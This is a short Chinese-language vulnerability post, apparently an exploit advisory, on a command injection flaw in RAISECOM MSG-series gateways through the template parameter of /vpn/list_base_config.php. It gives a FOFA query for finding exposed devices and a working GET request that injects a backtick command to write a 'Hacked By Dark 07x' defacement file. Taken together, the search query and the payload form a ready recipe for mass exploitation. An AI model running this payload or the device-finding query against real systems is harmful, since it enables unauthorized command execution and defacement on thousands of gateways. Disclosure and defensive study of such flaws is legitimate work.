已发现 RAISECOM 网关设备中存在命令注入漏洞,影响型号 MSG1200、MSG2100E、MSG2200 和 MSG2300。该漏洞允许远程攻击者通过 Web 界面在系统上执行任意命令。问题存在于 list_base_config.php 脚本中,具体通过 template 参数,影响互联网上超过 25,112 台设备。
✔ FOFA : title="web user login" && body="<META content="MSHTML 6.00.2900.5583" name=GENERATOR>"
URI:/vpn/list_base_config.php
描述: list_base_config.php 是 RAISECOM 网关设备中用于管理 VPN 配置的基于 Web 的界面组件。已识别的漏洞是由于该脚本对 template 参数的处理不当所致。该参数可以被利用来在设备的操作系统上执行任意命令,因为输入消毒不足。
CWE-77:命令注入
以下是一个通过 curl 命令利用该漏洞的示例:
GET "http://host.com/vpn/list_base_config.php?type=mod&parts=base_config&template=%60echo%20-e%20%27{{Hacked By Dark 07x}}%27%3E%20%2Fwww%2Ftmp%2Finfo.html%60"
在此示例中,curl 命令向 list_base_config.php 脚本发送恶意 HTTP GET 请求。该请求利用 template 参数执行命令。